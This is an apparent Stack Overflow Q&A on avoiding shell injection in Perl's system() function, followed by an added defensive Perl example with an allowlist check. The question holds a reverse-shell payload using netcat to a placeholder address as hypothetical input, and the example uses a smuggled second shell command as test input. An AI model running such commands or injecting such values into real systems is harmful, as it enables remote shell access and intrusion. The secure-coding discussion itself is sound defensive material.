
Avoiding code injection in system perl function

Tags:

perl

system() is a function that executes a file with 'n' args, 'n' meaning any real number.

If we have: system("path/to/program","firstArg","secondArg",...); the string inside the second argument will always be a string passed to "path/to/program", right?

If I do like: system("path/to/program","legitArg",$userinput); - is $userinput vulnerable to code injection? Or will it be passed as a string to path/to/program? Even if $userinput="some_kind_of_escape /bin/nc -e /bin/sh 10.0.0.1 1234" ?

If not, how can I parametrise such arguments?

Update: based on the answer below I found this from Stanford: using the perl system() function

int3 asked Mar 13 '23 00:03


1 Answer

That's (almost) correct usage to avoid shell injection, since Perl will use execvp to directly execute the given program, without passing the arguments through a command shell.

From perldoc system:

If there is more than one argument in LIST, or if LIST is an array with more than one value, starts the program given by the first element of the list with arguments given by the rest of the list. If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient. On Windows, only the "system PROGRAM LIST" syntax will reliably avoid using the shell; "system LIST", even with more than one element, will fall back to the shell if the first spawn fails.

Note the caveat about system LIST vs system PROGRAM LIST on Windows systems, so if your code is going to run there you should use:

system {"path/to/program"} "program-name", "legitArg", $userInput;

Nothing will protect you, of course, if the program that's being executed takes that user-supplied argument and passes it on to a shell itself.

Alnitak answered Mar 16 '23 00:03
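The following is an added example, not part of the original question or answer, showing the behaviour the answer describes: in the LIST and PROGRAM LIST forms of system() the user-supplied value reaches the child as exactly one argv element, with no shell involved. It uses the running perl ($^X) as the child program so it is self-contained; the hostile-looking $userinput string, the run_with_user_arg() wrapper, and its allowlist pattern are constructed for this example.

```perl
#!/usr/bin/env perl
# Added example (not from the original post): shows that the multi-argument
# forms of system() hand user input to the child as a single argv element.
use strict;
use warnings;

# Constructed hostile-looking input. Under "/bin/sh -c" this would be split
# into words and ";" would start a second command; here it must stay whole.
my $userinput = 'foo; echo INJECTED > /tmp/x';

# Child program: the current perl, printing each argv element in brackets.
# The trailing "--" ends perl's own option parsing, so an input that starts
# with "-" cannot be mistaken for a switch by the child (option injection).
my @child = ($^X, '-e', 'print "[$_]\n" for @ARGV', '--');

# 1. system LIST: Perl calls execvp() directly; no shell, no word splitting.
my $rc = system(@child, 'legitArg', $userinput);
die "child failed: $?\n" if $rc != 0;
# Prints:
#   [legitArg]
#   [foo; echo INJECTED > /tmp/x]

# 2. system PROGRAM LIST (the form the answer recommends for Windows):
#    the block names the file to execute, the list supplies argv[0..n].
$rc = system { $^X } 'perl', '-e', 'print "[$_]\n" for @ARGV', '--',
                     'legitArg', $userinput;
die "child failed: $?\n" if $rc != 0;

# 3. Contrast, deliberately NOT executed: a single string is checked for
#    shell metacharacters and, if any are present, passed to "/bin/sh -c".
#    Never interpolate user input into this form:
#      system("path/to/program legitArg $userinput");   # shell injection

# 4. The answer's caveat: list-form system() only guarantees how the
#    argument reaches the child; it cannot stop the child from handing it
#    to a shell itself. So also restrict the input to what the callee
#    legitimately needs. Assumption for this example: a bare token such as
#    a file name, with no leading "-".
sub run_with_user_arg {
    my ($arg) = @_;
    return 0 unless $arg =~ /\A[\w.]+\z/;     # allowlist: word chars and dots
    return 0 if $arg =~ /\A-/;                # reject option-like values
    my $status = system(@child, 'legitArg', $arg);
    return $status == 0;
}

print run_with_user_arg('report.txt') ? "accepted\n" : "rejected\n";  # accepted
print run_with_user_arg($userinput)   ? "accepted\n" : "rejected\n";  # rejected
```

Running the script shows the bracketed output for steps 1 and 2, confirming that the whole string, separators included, arrived as one argument. The allowlist in run_with_user_arg() is the part that addresses the answer's last sentence: it is the only defence left once the argument is inside a program you do not control.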